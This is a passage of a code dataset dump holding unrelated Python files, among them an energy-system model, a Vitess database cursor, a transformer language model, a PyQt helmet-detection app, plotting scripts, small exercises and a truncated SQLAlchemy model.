Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='transformer',\n flow_rates={\n 'fuel': nts.MinMax(min=0, max=45325.42373),\n 'electricity': nts.MinMax(min=0, max=26742)},\n flow_costs={'fuel': 0, 'electricity': 88.7},\n flow_emissions={'fuel': 0, 'electricity': 0.3366},\n )\n\n coal_supply_line = components.Bus(\n name='Coal Supply Line',\n inputs=('Coal Supply.fuel',),\n outputs=('HKW.fuel', 'HKW2.fuel'),\n # Minimum number of arguments required\n sector='Coupled',\n carrier='Coal',\n node_type='bus',\n )\n\n high_electricity_line = components.Bus(\n name='High Voltage Grid',\n inputs=(\n 'Offshore Wind Power.electricity',\n 'GuD.electricity',\n 'HKW.electricity',\n 'HKW2.electricity',\n ),\n outputs=('Power Sink.electricity',),\n # Minimum number of arguments required\n sector='Power',\n carrier='electricity',\n node_type='bus',\n )\n\n high_medium_transformator = components.Connector(\n name='High Voltage Transfer Grid',\n interfaces=(\n 'Medium Voltage Grid',\n 'High Voltage Grid',\n ),\n conversions={\n ('Medium Voltage Grid', 'High Voltage Grid'): 1,\n ('High Voltage Grid', 'Medium Voltage Grid'): 1,\n },\n node_type='connector',\n )\n\n # 4. Create the actual energy system:\n es = energy_system.AbstractEnergySystem(\n uid=\"LossLC\",\n busses=(\n gas_supply_line,\n low_electricity_line,\n heat_line,\n medium_electricity_line,\n high_electricity_line,\n coal_supply_line,\n biogas_supply_line,\n ),\n sinks=(\n household_demand,\n commercial_demand,\n heat_demand,\n industrial_demand,\n car_charging_station_demand,\n ),\n sources=(\n solar_panel,\n gas_supply,\n onshore_wind_power,\n offshore_wind_power,\n coal_supply,\n solar_thermal,\n biogas_supply,\n ),\n transformers=(\n bhkw_generator,\n power_to_heat,\n gud_generator,\n hkw_generator,\n hkw_generator_2,\n ),\n connectors=(\n low_medium_transformator,\n high_medium_transformator,\n ),\n timeframe=timeframe,\n global_constraints=global_constraints,\n )\n\n return es\n","sub_path":"docs/source/getting_started/examples/application/phd/field_study/LossLC/creation.py","file_name":"creation.py","file_ext":"py","file_size_in_byte":16093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"134011055","text":"# Copyright 2012, Google Inc. 
All rights reserved.\n# Use of this source code is governed by a BSD-style license that can\n# be found in the LICENSE file.\n\nimport itertools\nimport operator\nimport re\n\nfrom vtdb import cursor\nfrom vtdb import dbexceptions\nfrom vtdb import keyrange_constants\n\n\nwrite_sql_pattern = re.compile('\\s*(insert|update|delete)', re.IGNORECASE)\n\n\nclass VTGateCursor(object):\n  arraysize = 1\n  lastrowid = None\n  rowcount = 0\n  results = None\n  _conn = None\n  description = None\n  index = None\n  keyspace = None\n  tablet_type = None\n  keyspace_ids = None\n  keyranges = None\n  _writable = None\n  routing = None\n\n  def __init__(self, connection, keyspace, tablet_type, keyspace_ids=None, keyranges=None, writable=False):\n    self._conn = connection\n    self.keyspace = keyspace\n    self.tablet_type = tablet_type\n    self.keyspace_ids = keyspace_ids\n    self.keyranges = keyranges\n    self._writable = writable\n\n  def connection_list(self):\n    return [self._conn]\n\n  def close(self):\n    self.results = None\n\n  def is_writable(self):\n    return self._writable\n\n  def commit(self):\n    return self._conn.commit()\n\n  def begin(self):\n    return self._conn.begin()\n\n  def rollback(self):\n    return self._conn.rollback()\n\n  # pass kargs here in case higher level APIs need to push more data through\n  # for instance, a key value for shard mapping\n  def execute(self, sql, bind_variables, **kargs):\n    self.rowcount = 0\n    self.results = None\n    self.description = None\n    self.lastrowid = None\n\n    sql_check = sql.strip().lower()\n    if sql_check == 'begin':\n      self.begin()\n      return\n    elif sql_check == 'commit':\n      self.commit()\n      return\n    elif sql_check == 'rollback':\n      self.rollback()\n      return\n\n    write_query = bool(write_sql_pattern.match(sql))\n    # NOTE: This check may also be done at higher layers, but it is added here for completeness.\n    if write_query:\n      if not self.is_writable():\n        raise dbexceptions.DatabaseError('DML on a non-writable cursor', sql)\n\n    self.results, self.rowcount, self.lastrowid, self.description = self._conn._execute(\n        sql,\n        bind_variables,\n        self.keyspace,\n        self.tablet_type,\n        keyspace_ids=self.keyspace_ids,\n        keyranges=self.keyranges)\n    self.index = 0\n    return self.rowcount\n\n  def execute_entity_ids(self, sql, bind_variables, entity_keyspace_id_map, entity_column_name):\n    self.rowcount = 0\n    self.results = None\n    self.description = None\n    self.lastrowid = None\n\n    # This is by definition a scatter query, so raise exception.\n    write_query = bool(write_sql_pattern.match(sql))\n    if write_query:\n      raise dbexceptions.DatabaseError('execute_entity_ids is not allowed for write queries')\n\n    self.results, self.rowcount, self.lastrowid, self.description = self._conn._execute_entity_ids(\n        sql,\n        bind_variables,\n        self.keyspace,\n        self.tablet_type,\n        entity_keyspace_id_map,\n        entity_column_name)\n    self.index = 0\n    return self.rowcount\n\n\n  def fetchone(self):\n    if self.results is None:\n      raise dbexceptions.ProgrammingError('fetch called before execute')\n\n    if self.index >= len(self.results):\n      return None\n    self.index += 1\n    return self.results[self.index-1]\n\n  def fetchmany(self, size=None):\n    if self.results is None:\n      raise dbexceptions.ProgrammingError('fetch called before execute')\n\n    if self.index >= len(self.results):\n      return []\n    if size is None:\n      size = self.arraysize\n    res = self.results[self.index:self.index+size]\n    self.index += size\n    return res\n\n  def fetchall(self):\n    if self.results is None:\n      raise dbexceptions.ProgrammingError('fetch called before execute')\n    return 
self.fetchmany(len(self.results)-self.index)\n\n  def fetch_aggregate_function(self, func):\n    return func(row[0] for row in self.fetchall())\n\n  def fetch_aggregate(self, order_by_columns, limit):\n    sort_columns = []\n    desc_columns = []\n    for order_clause in order_by_columns:\n      if type(order_clause) in (tuple, list):\n        sort_columns.append(order_clause[0])\n        if order_clause[1].lower() == 'desc':\n          desc_columns.append(order_clause[0])\n      else:\n        sort_columns.append(order_clause)\n    # sort the rows and then trim off the prepended sort columns\n\n    if sort_columns:\n      sorted_rows = list(sort_row_list_by_columns(self.fetchall(), sort_columns, desc_columns))[:limit]\n    else:\n      sorted_rows = itertools.islice(self.fetchall(), limit)\n    neutered_rows = [row[len(order_by_columns):] for row in sorted_rows]\n    return neutered_rows\n\n  def callproc(self):\n    raise dbexceptions.NotSupportedError\n\n  def executemany(self, *pargs):\n    raise dbexceptions.NotSupportedError\n\n  def nextset(self):\n    raise dbexceptions.NotSupportedError\n\n  def setinputsizes(self, sizes):\n    pass\n\n  def setoutputsize(self, size, column=None):\n    pass\n\n  @property\n  def rownumber(self):\n    return self.index\n\n  def __iter__(self):\n    return self\n\n  def next(self):\n    val = self.fetchone()\n    if val is None:\n      raise StopIteration\n    return val\n\n\nclass BatchVTGateCursor(VTGateCursor):\n  def __init__(self, connection, keyspace, tablet_type, keyspace_ids=None,\n               keyranges=None, writable=False):\n    # rowset is [(results, rowcount, lastrowid, fields),]\n    self.rowsets = None\n    self.query_list = []\n    self.bind_vars_list = []\n    VTGateCursor.__init__(self, connection, keyspace, tablet_type,\n                          keyspace_ids=keyspace_ids, writable=writable)\n\n  def execute(self, sql, bind_variables=None):\n    self.query_list.append(sql)\n    self.bind_vars_list.append(bind_variables)\n\n  def flush(self):\n    self.rowsets = self._conn._execute_batch(self.query_list,\n                                             self.bind_vars_list,\n                                             self.keyspace,\n                                             self.tablet_type,\n                                             self.keyspace_ids)\n    self.query_list = []\n    self.bind_vars_list = []\n\n\nclass StreamVTGateCursor(VTGateCursor):\n  arraysize = 1\n  conversions = None\n  connection = None\n  description = None\n  index = None\n  fetchmany_done = False\n\n  def __init__(self, connection, keyspace, tablet_type, keyspace_ids=None, keyranges=None, writable=False):\n    VTGateCursor.__init__(self, connection, keyspace, tablet_type, keyspace_ids=keyspace_ids, keyranges=keyranges)\n\n  # pass kargs here in case higher level APIs need to push more data through\n  # for instance, a key value for shard mapping\n  def execute(self, sql, bind_variables, **kargs):\n    if self._writable:\n      raise dbexceptions.ProgrammingError('Streaming query cannot be writable')\n\n    self.description = None\n    x, y, z, self.description = self._conn._stream_execute(\n        sql,\n        bind_variables,\n        self.keyspace,\n        self.tablet_type,\n        keyspace_ids=self.keyspace_ids,\n        keyranges=self.keyranges)\n    self.index = 0\n    return 0\n\n  def fetchone(self):\n    if self.description is None:\n      raise dbexceptions.ProgrammingError('fetch called before execute')\n\n    self.index += 1\n    return self._conn._stream_next()\n\n  # fetchmany can be called until it returns no rows. 
Returning less rows\n # than what we asked for is also an indication we ran out, but the cursor\n # API in PEP249 is silent about that.\n def fetchmany(self, size=None):\n if size is None:\n size = self.arraysize\n result = []\n if self.fetchmany_done:\n self.fetchmany_done = False\n return result\n for i in xrange(size):\n row = self.fetchone()\n if row is None:\n self.fetchmany_done = True\n break\n result.append(row)\n return result\n\n def fetchall(self):\n result = []\n while True:\n row = self.fetchone()\n if row is None:\n break\n result.append(row)\n return result\n\n def callproc(self):\n raise dbexceptions.NotSupportedError\n\n def executemany(self, *pargs):\n raise dbexceptions.NotSupportedError\n\n def nextset(self):\n raise dbexceptions.NotSupportedError\n\n def setinputsizes(self, sizes):\n pass\n\n def setoutputsize(self, size, column=None):\n pass\n\n @property\n def rownumber(self):\n return self.index\n\n def __iter__(self):\n return self\n\n def next(self):\n val = self.fetchone()\n if val is None:\n raise StopIteration\n return val\n\n\n# assumes the leading columns are used for sorting\ndef sort_row_list_by_columns(row_list, sort_columns=(), desc_columns=()):\n for column_index, column_name in reversed([x for x in enumerate(sort_columns)]):\n og = operator.itemgetter(column_index)\n if type(row_list) != list:\n row_list = sorted(\n row_list, key=og, reverse=bool(column_name in desc_columns))\n else:\n row_list.sort(key=og, reverse=bool(column_name in desc_columns))\n return row_list\n","sub_path":"py/vtdb/vtgate_cursor.py","file_name":"vtgate_cursor.py","file_ext":"py","file_size_in_byte":8899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"89640762","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom otrans.data import PAD\nfrom otrans.metrics import LabelSmoothingLoss\nfrom otrans.layer import TransformerEncoderLayer\nfrom otrans.module import PositionalEncoding\n\n\ndef get_seq_mask(targets):\n batch_size, steps = targets.size()\n seq_mask = torch.ones([batch_size, steps, steps], device=targets.device)\n seq_mask = torch.tril(seq_mask).bool()\n return seq_mask\n\n\nclass TransformerLanguageModel(nn.Module):\n def __init__(self, params):\n super(TransformerLanguageModel, self).__init__()\n\n self.model_type = 'transformer_lm'\n self.normalize_before = False\n self.smoothing = params['smoothing']\n self.vocab_size = params['vocab_size']\n self.num_blocks = params['num_blocks']\n\n self.embedding = nn.Embedding(self.vocab_size, params['d_model'])\n self.pos_embedding = PositionalEncoding(params['d_model'], 0.0)\n\n self.blocks = nn.ModuleList([\n TransformerEncoderLayer(\n params['n_heads'], params['d_model'], params['ffn_units'],\n slf_attn_dropout_rate=0.0, ffn_dropout_rate=0.0,\n residual_dropout_rate=params['residual_dropout_rate'],\n normalize_before=False, concat_after=False, activation='glu') for _ in range(self.num_blocks)\n ])\n\n if self.normalize_before:\n self.after_norm = nn.LayerNorm(params['d_model'])\n\n self.output_project = nn.Linear(params['d_model'], self.vocab_size)\n\n if params['share_embedding']:\n self.output_project.weight = self.embedding.weight\n print('Share the weight of embedding to the output project layer!')\n\n self.crit = LabelSmoothingLoss(size=self.vocab_size, smoothing=self.smoothing, padding_idx=PAD)\n\n def forward(self, inputs, targets, pitchs=None):\n\n dec_mask = get_seq_mask(inputs)\n dec_output = self.embedding(inputs)\n dec_output = 
self.pos_embedding(dec_output)\n\n for _, block in enumerate(self.blocks):\n dec_output, dec_mask = block(dec_output, dec_mask)\n\n if self.normalize_before:\n dec_output = self.after_norm(dec_output)\n\n logits = self.output_project(dec_output)\n loss = self.crit(logits, targets)\n\n return loss\n\n def predict(self, targets):\n\n dec_output = self.embedding(targets)\n dec_output = self.pos_embedding(dec_output)\n\n dec_mask = get_seq_mask(targets)\n\n for _, block in enumerate(self.blocks):\n dec_output, dec_mask = block(dec_output, dec_mask)\n\n if self.normalize_before:\n dec_output = self.after_norm(dec_output)\n\n logits = self.output_project(dec_output)\n\n log_probs = F.log_softmax(logits[:, -1, :].unsqueeze(1), dim=-1)\n return log_probs\n","sub_path":"otrans/model/lm.py","file_name":"lm.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"650290069","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('man', '0005_lectiveyear'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='class',\n name='lective_year',\n field=models.ForeignKey(default=1, to='man.LectiveYear'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='tsubject',\n name='lective_year',\n field=models.ForeignKey(default=1, to='man.LectiveYear'),\n preserve_default=False,\n ),\n ]\n","sub_path":"schoolman - Copy/man/migrations/0006_auto_20150804_1246.py","file_name":"0006_auto_20150804_1246.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"287270825","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\nif hasattr(sys, 'frozen'):\n os.environ['PATH'] = sys._MEIPASS + \";\" + os.environ['PATH']\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import QFileInfo\nfrom PyQt5.QtWidgets import QFileDialog\nimport gluoncv as gcv\nfrom mxnet import gluon\n#import time\nimport mxnet as mx\nimport cv2\nimport win32com.client\nimport winsound\n\nclass Ui_Form(object):\n def setupUi(self, Form):\n Form.setObjectName(\"SafetyHelmetDetect\")\n Form.resize(520, 250)\n self.open_path_text = QtWidgets.QLineEdit(Form)\n self.open_path_text.setGeometry(QtCore.QRect(40, 30, 380, 30))\n self.open_path_text.setObjectName(\"open_path_text\")\n self.open_path_but = QtWidgets.QPushButton(Form)\n self.open_path_but.setGeometry(QtCore.QRect(430, 30, 75, 30))\n self.open_path_but.setObjectName(\"open_path_but\")\n \n self.textbox = QtWidgets.QLineEdit(Form)\n self.textbox.setGeometry(QtCore.QRect(40, 70, 380, 30))\n self.textbox.setObjectName(\"textbox\")\n self.button = QtWidgets.QPushButton(Form)\n self.button.setGeometry(QtCore.QRect(430, 70, 75, 30))\n self.button.setObjectName(\"button\")\n\n self.quitbutton = QtWidgets.QPushButton(Form)\n self.quitbutton.setGeometry(QtCore.QRect(430, 110, 75, 30))\n self.quitbutton.setObjectName(\"quitbutton\")\n \n self.label = QtWidgets.QLabel(Form)\n self.label.setGeometry(QtCore.QRect(40, 90, 399, 90))\n self.label.setFont(QtGui.QFont(\"Roman times\", 12, QtGui.QFont.Bold))\n self.label.setText(\"Please select the video file input address\")\n\n self.label2 = QtWidgets.QLabel(Form)\n self.label2.setGeometry(QtCore.QRect(40, 120, 399, 120))\n self.label2.setFont(QtGui.QFont(\"Roman times\", 12, QtGui.QFont.Bold))\n 
self.label2.setText(\"Video format requirements are mp4 format\")\n\n\n self.label3 = QtWidgets.QLabel(Form)\n self.label3.setGeometry(QtCore.QRect(40, 150, 450, 150))\n self.label3.setFont(QtGui.QFont(\"Roman times\", 12, QtGui.QFont.Bold))\n self.label3.setText(\"Output files are saved in the Result directory\")\n\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n \n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"SafetyHelmetDetect\", \"SafetyHelmetDetect\"))\n self.open_path_text.setPlaceholderText(_translate(\"SafetyHelmetDetect\", \"Open the file address\"))\n self.open_path_but.setText(_translate(\"SafetyHelmetDetect\", \"Browse\"))\n self.open_path_but.clicked.connect(self.open_event)\n\n self.textbox.setPlaceholderText(\"show the video rtsp url address\")\n self.button.setText(\"Yes\")\n self.button.clicked.connect(self.on_click)\n self.quitbutton.setText(\"Quit\")\n self.quitbutton.clicked.connect(self.quit_click)\n\n\n def quit_click(self):\n sys.exit()\n\n \n def on_click(self):\n textboxValue = self.textbox.text()\n path = str(textboxValue)\n # print(path)\n if path is not None:\n self.detect(path)\n \n def open_event(self):\n _translate = QtCore.QCoreApplication.translate\n directory1 = QFileDialog.getOpenFileName(None, \"Select a file\", \"C:/\")\n # print(directory1)\n path = directory1[0]\n self.open_path_text.setText(_translate(\"SafetyHelmetDetect\", path))\n if path is not None:\n self.detect(path)\n\n def detect(self, path):\n classes = ['hat', 'person']\n ctx = mx.cpu()\n\n net = gluon.SymbolBlock.imports(symbol_file='./darknet53-symbol.json', input_names=['data'], param_file='./darknet53-0000.params', ctx=ctx)\n while True:\n cap = cv2.VideoCapture(path)\n i = -1\n T = 40\n while (cap.isOpened()):\n cap.set(cv2.CAP_PROP_POS_FRAMES, T)\n ret, frame = cap.read()\n if ret != True or ((cv2.waitKey(1) & 0xff == ord('q')) or (cv2.waitKey(1) & 0xff == 27)):\n break\n # Image pre-processing\n frame = mx.nd.array(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)).astype('uint8')\n rgb_nd, scaled_frame = gcv.data.transforms.presets.yolo.transform_test(frame, short=512, max_size=700)\n\n # Run frame through network\n class_IDs, scores, bounding_boxes = net(rgb_nd)\n \n # Display the result\n scale = 1.0 * frame.shape[0] / scaled_frame.shape[0]\n img = gcv.utils.viz.cv_plot_bbox(frame.asnumpy(), bounding_boxes[0], scores[0], class_IDs[0], class_names=classes, scale=scale)\n gcv.utils.viz.cv_plot_image(img)\n cv2.waitKey(1)\n if [1.] 
in list(class_IDs[0].asnumpy()):\n # person confidences\n index_person = [i for i, x in enumerate(list(class_IDs[0].asnumpy())) if x == [1.]]\n list_scores = list(scores[0].asnumpy())\n person_scores = [list_scores[i] for i in index_person]\n if max(person_scores) > 0.4:\n i += 1\n # draw bounding boxes on picture\n cv2.imwrite('./results/' + str(i) + '.jpg', img[..., ::-1])\n self.beep()\n \n \n cap.release()\n #cv2.destroyAllWindows()\n\n def beep(self):\n speak = win32com.client.Dispatch('SAPI.SPVOICE')\n winsound.Beep(2019, 1000)\n speak.Speak('请戴上安全帽')\n\n\nif __name__ == \"__main__\":\n if not os.path.isdir('./results'):\n os.mkdir('./results')\n \n app = QtWidgets.QApplication(sys.argv)\n widget = QtWidgets.QWidget()\n ui = Ui_Form()\n ui.setupUi(widget)\n widget.show()\n sys.exit(app.exec_())\n \n","sub_path":"helmetdetect/helmetdetect.py","file_name":"helmetdetect.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"438155655","text":"##PI pattern on line 33\ndef handle_dual_graph(self, words1, words2):\n words1.set_color(\"yellow\")\n words2.set_color(\"yellow\")\n connected = TextMobject(\"Connected\")\n connected.set_color(\"lightgreen\")\n not_connected = TextMobject(\"Not Connected\")\n not_connected.set_color(\"red\")\n for mob in connected, not_connected:\n mob.shift(self.points[3] + UP)\n\n self.play(*[\n ShowCreation(mob, run_time = 1.0)\n for mob in self.edges + self.vertices\n ])\n self.wait()\n for region in self.regions:\n self.set_color_region(region)\n self.add(words1)\n self.wait()\n self.reset_background()\n self.add(words2)\n\n region_pairs = it.combinations(self.graph.region_cycles, 2)\n for x in range(6):\n want_matching = (x%2 == 0)\n found = False\n while True:\n try:\n cycle1, cycle2 = next(region_pairs)\n except:\n return\n shared = set(cycle1).intersection(cycle2)\n if len(shared) == 2 and want_matching:\n break\n if len(shared) != 2 and not want_matching:\n break\n for cycle in cycle1, cycle2:\n index = self.graph.region_cycles.index(cycle)\n self.set_color_region(self.regions[index])\n if want_matching:\n self.remove(not_connected)\n self.add(connected)\n tup = tuple(shared)\n if tup not in self.graph.edges:\n tup = tuple(reversed(tup))\n edge = deepcopy(self.edges[self.graph.edges.index(tup)])\n edge.set_color(\"red\")\n self.play(ShowCreation(edge), run_time = 1.0)\n self.wait()\n self.remove(edge)\n else:\n self.remove(connected)\n self.add(not_connected)\n self.wait(2)\n self.reset_background()","sub_path":"evaluation/pi-set_1.py","file_name":"pi-set_1.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"53538656","text":"import matplotlib.pyplot as pli # -> 시각화\nimport numpy as np # -> 데이터 분석\nimport math # -> 수학 관련 함수가 많음 파이, 절대값, 사인, 코사인\ny_or_Y = 'd'\nwhile y_or_Y != 'Y' and y_or_Y != 'y':\n shape = input('어떤 도형을 그릴까요?')\n if shape == '타원':\n a=input(\"타원을 그리겠습니다\\nx^2/a+y^2/b일때\\na를 입력해주세요\") \n b=input(\"타원을 그리겠습니다\\nx^2/a+y^2/b일때\\nb를 입력해주세요\")\n a=int(a) \n b=int(b)\n #x값 설정\n x = np.arange(0,math.sqrt(a)+0.01,0.00001)\n #y값 설정\n y=np.sqrt(b-b*x**2/a) \n #각 사분면에 대해 대칭이라는 점을 이용하여 점을 찍음\n pli.plot(x,y,'b')\n pli.plot(x,-y,'b')\n pli.plot(-x,-y,'b')\n pli.plot(-x,y,'b')\n pli.axis(\"equal\")\n pli.title('Ellipse')\n pli.grid(True)\n pli.gca().set_aspect(\"equal\")\n pli.show() \n\n elif shape == '쌍곡선':\n a=input(\"쌍곡선을 그리겠습니다\\nx^2/a+y^2/b=1일때\\na를 
입력해주세요\")\n b=input(\"쌍곡선을 그리겠습니다\\nx^2/a+y^2/b=1일때\\nb를 입력해주세요\")\n asymptote=input(\"점근선을 표시할까요?\")#예 -> 점근선 표시\n a=int(a)\n b=int(b)\n x = np.arange(0,50,0.00001)\n asymptote_a=np.array(x*b/a)\n asymptote_b=np.array(-x*b/a)\n y=np.sqrt(-b+b*x**2/a)\n pli.plot(x,y,'k')\n pli.plot(x,-y,'k')\n pli.plot(-x,-y,'k')\n pli.plot(-x,y,'k')\n if asymptote == '예':\n pli.plot(x,asymptote_a,'--b')\n pli.plot(x,asymptote_b,'--b')\n pli.plot(-x,asymptote_a,'--b')\n pli.plot(-x,asymptote_b,'--b')\n pli.title('Hyperbolic')\n pli.axis(\"equal\")\n pli.grid(True)\n pli.gca().set_aspect(\"equal\")\n pli.show()\n\n elif shape == '포물선':\n a=input(\"포물선을 그리겠습니다 4p를 입력해주세요\")\n b=input(\"x축이 준선입니까? y축이 준선입니까?\")\n asymptote=input(\"준선을 표시할까요?\")\n a=int(a)\n if b == 'x' or b == 'x축':\n x = np.arange(-100,100,0.001)\n y = x**2/a\n pli.plot(x,y,'k')\n a = np.array([a/4 for i in range(0,200000)])\n if asymptote == '예':\n pli.plot(x,-a,'--b')\n if b == 'y' or b == 'y축':\n x = np.arange(-100,100,0.001)\n y = np.sqrt(x*a)\n pli.plot(x,y,'k')\n pli.plot(x,-y,'k')\n a = np.array([a/4 for i in range(0,200000)])\n if asymptote == '예':\n pli.plot(-a,x,'--b')\n pli.axis(\"equal\")\n pli.grid(True)\n pli.gca().set_aspect(\"equal\")\n pli.show()\n y_or_Y = input(\"종료하고싶다면 y나 Y를 눌러주세요\")","sub_path":"gihasuheng.py","file_name":"gihasuheng.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"607088798","text":"import xml.etree.ElementTree as ET\nimport json\nmy_data = []\nmycont = 0\ndef extract_skeleton(path):\n global mycont\n tree = ET.parse(path)\n my_skeleton = []\n root = tree.getroot()\n\n for i,child in enumerate(root):\n # there are many skeletons tracked, each folder has only one skeleton Tracked\n if (i == 0) or True:\n #print(child)\n for option in child:\n if option.tag == \"Joints\":\n for joint in option:\n position = joint[0]\n #print(f'x={position[0].text}; y={position[1].text}; z={position[2].text}')\n x=position[0].text\n y=position[1].text\n z=position[2].text\n my_skeleton.append({\"x\": x, \"y\": y, \"z\":z})\n if ((mycont % 20 == 0) and (mycont<200)) or x=='0':\n pass\n #print(f'{path[-10:]} {x},{y},{z}')\n mycont = mycont + 1\n #print(len(my_skeleton))\n return my_skeleton\n\ndef run_sample():\n folder = 'dataset/Misc/KinectOutput40/Skeleton'\n folder = 'dataset/Fighting/KinectOutput106/Skeleton'\n\n from os import walk\n for (dirpath, dirnames, filenames) in walk(folder):\n for filename in filenames:\n my_data.append(extract_skeleton(f'{folder}/{filename}'))\n\n with open(\"skeletons.json\", \"w\") as write_file:\n json.dump(my_data, write_file)\n #print(f'{len(my_data)} frames saved')\n\n\nrun_sample()","sub_path":"skeleton_extractor.py","file_name":"skeleton_extractor.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"460423619","text":"'''\n77. Combinations\n\nGiven two integers n and k, return all possible combinations of k numbers out of 1 ... 
n.\n\nIf n = 4 and k = 2, a solution is:\n\n[\n [2,4],\n [3,4],\n [2,3],\n [1,2],\n [1,3],\n [1,4],\n]\n'''\nimport itertools\n\nclass Solution(object):\n def combine(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: List[List[int]]\n \"\"\"\n# Using itertools API:\n def __directed_combination(n, k):\n iterable = range(1, n + 1)\n for comb in itertools.combinations(iterable, k):\n yield list(comb)\n return list(__directed_combination(n, k))\n\n# Using generator:\n #def __directed_combination(n, k):\n # cnt, ans = 0, []\n # while cnt < n:\n # while _ in k:\n # yield cnt\n\n def combine_dfs(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: List[List[int]]\n \"\"\"\n # idea: dfs backtricking solution (too slow...)\n def dfs(partial):\n print(len(partial))\n if len(partial) == k:\n res.append(partial) # main checking condition\n return\n if len(partial) > k:\n return\n # if not valid partial\n for n in nums:\n if n in partial or (partial and n > partial[-1]):\n continue # already in the partial list\n dfs(partial + [n]) # generate new dfs\n\n res = []\n nums = [i for i in range(1, n + 1)]\n dfs([])\n return res\n\nif __name__ == \"__main__\":\n res = Solution().combine_dfs(4, 2)\n print(res)\n\n\n\n\n","sub_path":"77_combinations.py","file_name":"77_combinations.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"29843756","text":"from NeuralLayer import *\n\ndef sigmoid(x, deriv=False):\n import numpy as np\n\n if deriv:\n return x*(1-x)\n return 1/(1+np.exp(-x))\n\nclass NeuralNetwork:\n\n def __init__(self, neurons_numbers):\n \"\"\" \n Create a fully interconnected neural network\n \n :params neurons_numbers: Array of int. Each int represent the number of neuron in a single layer\n \"\"\"\n\n self.neurons_numbers = neurons_numbers\n self.layers = []\n\n for i in range(0, len(neurons_numbers) - 1):\n self.layers.append(NeuralLayer(neurons_numbers[i], neurons_numbers[i + 1]))\n\n def process(self, inputs):\n outputs = inputs\n\n for l in self.layers:\n outputs = l.process(outputs, sigmoid)\n \n return outputs\n\n\nif __name__ == \"__main__\":\n neurons = [5, 4, 3, 2]\n network = NeuralNetwork(neurons)\n\n inputs = [0.1, 0.5, 0.9, 0.4, 0.33]\n network.process(inputs)","sub_path":"Neural Network/Structure/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"46723236","text":"\nimport pygame, random\n# Let's import the Car Class\nfrom car import Car\n\npygame.init()\n\nGREEN = (20, 255, 140)\nGREY = (210, 210, 210)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nPURPLE = (255, 0, 255)\n\nSCREENWIDTH = 400\nSCREENHEIGHT = 500\n\nsize = (SCREENWIDTH, SCREENHEIGHT)\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"Car Racing\")\n\n# This will be a list that will contain all the sprites we intend to use in our game.\nall_sprites_list = pygame.sprite.Group()\n\nplayerCar = Car(RED, 20, 30)\nplayerCar.rect.x = 200\nplayerCar.rect.y = 300\n\n# Add the car to the list of objects\nall_sprites_list.add(playerCar)\n\n# Allowing the user to close the window...\ncarryOn = True\nclock = pygame.time.Clock()\n\nwhile carryOn:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n carryOn = False\n\n # Game Logic\n all_sprites_list.update()\n\n # Drawing on Screen\n screen.fill(GREEN)\n\n # Now let's draw all the sprites 
\n # Drawing on Screen\n screen.fill(GREEN)\n\n # Now let's draw all the sprites in one go. (For now we only have 1 sprite!)\n all_sprites_list.draw(screen)\n\n # Refresh Screen\n pygame.display.flip()\n\n # Number of frames per second e.g. 60\n clock.tick(60)\n\npygame.quit()","sub_path":"test/Classwork.py","file_name":"Classwork.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"495842739","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 10 16:52:08 2019\n\n@author: \n Jan Brekelmans\n j.j.w.c.brekelmans@gmail.com\n\"\"\"\n\nNUMBER = 1000\n\ndef compute():\n \n total = 0\n \n for a in range(1,NUMBER):\n for b in range(a,NUMBER):\n c = NUMBER - a - b\n \n if a*a + b*b == c*c:\n if total < a*b*c:\n total = a*b*c\n \n \n return str(total)\n \n \nif __name__ == \"__main__\":\n print(compute())","sub_path":"Python/projectEuler009.py","file_name":"projectEuler009.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"323670412","text":"from main import db\nimport pprint\n\nclass Event(db.Model):\n __tablename__ = 'event'\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String, nullable=False)\n type_id = db.Column(db.String, nullable=False)\n\n abstract = db.Column(db.String, nullable=True)\n speaker_names = db.Column(db.String, 